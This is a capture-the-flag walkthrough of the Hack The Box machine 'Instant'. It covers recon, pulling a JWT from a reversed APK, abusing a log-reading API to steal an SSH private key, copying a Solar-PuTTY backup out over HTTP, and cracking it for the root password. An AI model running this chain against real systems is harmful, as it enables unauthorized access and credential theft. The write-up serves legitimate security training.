Instant

Synopsis

Instant is a medium linux machine created by tahaafarooq. The instant.htb domain contains the apk file. The reversing of apk file reveals the subdomains and JWT token which is used to read the logs. Abusing the read logs functionality to read the id_rsa of the shirohige user. The /opt directory contains the Solar-PuTTY password protected encrypted .dat file which contains the session and credentials. Decryption the file reveals the root password.

OS	Difficulty	Points	Release Date	Retired Date
Linux	Medium	30	12-10-2024	01-03-2025

---

Enumeration

Nmap

Starting the nmap scan and found the ssh and http services running.

nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.37 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 09:30 EST
Warning: 10.10.11.37 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.37
Host is up (0.44s latency).
Not shown: 63941 closed tcp ports (conn-refused), 1592 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.45 seconds

Add instant.htb in /etc/hosts file.

Web - instant.htb

Instant is a crypto wallet. The website shows instant wallet features and we can download the instant.apk.

File - instant.apk

Downloaded the instant.apk and reversed it using the jadx-gui. It contains the JWT token and mywalletv1.instant.htb subdomain in AdminActivities class.

Text searching the .htb I got another subdomain swagger-ui.instant.htb.

Add both the mywalletv1 and swagger subdomain in /etc/hosts file.

To text search go to Navigation > Text Search

Web - swagger-ui.instant.htb

Swagger (software) is a suite of tools for API developers, the project is open-source and licensed under the Apache License 2.0.

swagger-ui subdomain

Clicking the Authorize button gives us form to input the Authorization token, adding the previously gained JWT gives us the authorization.

---

Foothold

Shell - shirohige [ read logs ]

The Logs section cantains the API to read and view the logs. It also shows the path to the log which is present in /home/shirohige/logs

Clicking the Try it out button and adding the default path to id_rsa file gives us the id_rsa.

Copy the id_rsa into the file and clear up the extra spaces and words.

chmod 600 id_rsa

ssh -i id_rsa shirohige@10.10.11.37                                                                                                                                      
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)                                                                                                            
                                                                                                                                                                             
 * Documentation:  https://help.ubuntu.com                                                                                                                                   
 * Management:     https://landscape.canonical.com                                                                                                                           
 * Support:        https://ubuntu.com/pro                                                                                                                                    

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Feb 17 05:42:25 2025 from 10.10.16.25
shirohige@instant:~$

The user.txt file contains the user flag 👏

---

Privilege Escalation

Pillaging - shirohige

Checking sudo privilege requires command, the instant.db is found which has some of the hashes but it is uncrackable using hashcat and rockyou.txt wordlist. The /opt/backups directory contains the SolarPutty directory.

shirohige@instant:~$ cd /opt/backups
shirohige@instant:/opt/backups$ ls
Solar-PuTTY

Solar-PuTTY is a free SSH client developed by SolarWinds that allows you to connect to any server or device on your network

The Solar-PuTTY directory contains the sessions-backup.dat file. The .dat file in Solar-PuTTY is used to store sessions and credentials which is encrypted.

shirohige@instant:/opt/backups/Solar-PuTTY$ ls
sessions-backup.dat

Shell - root [ .dat file decrypt ]

The VoidSec has created the github repository to decrypt the Solar-PuTTY .dat files using wordlists and saving it into the file.

The repository contains the .exe file which will execute in Windows machine properly but I am using Linux machine and wine32 is giving some error. The ItsWatchMakerr has created the github repository which contains the python script to decrypt the Solar-PuTTY .dat files and I will be using this script.

1

Transfering sessions-backup.dat file to local machine

Open the python http server in remote machine and download it using the wget in local machine.

shirohige@instant:/opt/backups/Solar-PuTTY$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.16.9 - - [18/Feb/2025 05:18:08] "GET /sessions-backup.dat HTTP/1.1" 200 -

wget http://10.10.11.37:8000/sessions-backup.dat                               
--2025-02-18 00:35:14--  http://10.10.11.37:8000/sessions-backup.dat
Connecting to 10.10.11.37:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100 (1.1K) [application/octet-stream]
Saving to: ‘sessions-backup.dat’

sessions-backup.dat                         100%[========================================================================================>]   1.07K  1.25KB/s    in 0.9s    

2025-02-18 00:35:16 (1.25 KB/s) - ‘sessions-backup.dat’ saved [1100/1100]

2

Git clone the above repository

git clone https://github.com/ItsWatchMakerr/SolarPuttyCracker.git
Cloning into 'SolarPuttyCracker'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 18 (delta 4), reused 10 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.97 KiB | 1.74 MiB/s, done.
Resolving deltas: 100% (4/4), done.

3

Create python virtual environment

To execute the script create the python virtual environment and activate it.

python3 -m venv .venv 
source .venv/bin/activate 

4

Install the required module and execute the script

Changing directory to SolarPuttyCracker and installing the required module.

cd SolarPuttyCracker 
pip3 install -r requirements.txt

Executing the script with required arguments.

python3 SolarPuttyCracker.py -w /usr/share/wordlists/rockyou.txt -o ../session_restore.txt ../sessions-backup.dat
   ____       __             ___         __   __          _____                 __            
  / __/___   / /___ _ ____  / _ \ __ __ / /_ / /_ __ __  / ___/____ ___ _ ____ / /__ ___  ____
 _\ \ / _ \ / // _ `// __/ / ___// // // __// __// // / / /__ / __// _ `// __//  '_// -_)/ __/
/___/ \___//_/ \_,_//_/   /_/    \_,_/ \__/ \__/ \_, /  \___//_/   \_,_/ \__//_/\_\ \__//_/   
                                                /___/                                         
Trying to decrypt using passwords from wordlist...
Decryption successful using password: estrella
[+] DONE Decrypted file is saved in: ../session_restore.txt

The session_restore.txt contains the root ssh password.

session_restore.txt

{
    "Sessions": [
        {
            "Id": "066894ee-635c-4578-86d0-d36d4838115b",
            "Ip": "10.10.11.37",
            "Port": 22,
            "ConnectionType": 1,
            "SessionName": "Instant",
            "Authentication": 0,
            "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
            "AuthenticateScript": "00000000-0000-0000-0000-000000000000",
            "LastTimeOpen": "0001-01-01T00:00:00",
            "OpenCounter": 1,
            "SerialLine": null,
            "Speed": 0,
            "Color": "#FF176998",
            "TelnetConnectionWaitSeconds": 1,
            "LoggingEnabled": false,
            "RemoteDirectory": ""
        }
    ],
    "Credentials": [
        {
            "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
            "CredentialsName": "instant-root",
            "Username": "root",
            "Password": "12**24nzC!r0c%q12",
            "PrivateKeyPath": "",
            "Passphrase": "",
            "PrivateKeyContent": null
        }
    ],
    "AuthScript": [],
    "Groups": [],
    "Tunnels": [],
    "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}

We will be using su command to change the user to root through shirohige because the SSH doesn't work using the above credentials.

shirohige@instant:/opt/backups/Solar-PuTTY$ su root
Password: 
root@instant:/opt/backups/Solar-PuTTY# whoami
root
root@instant:/opt/backups/Solar-PuTTY# 

The root.txt file contains the root flag 🎉

---

Proof of Concept

The below video provides the PoC of Instant machine.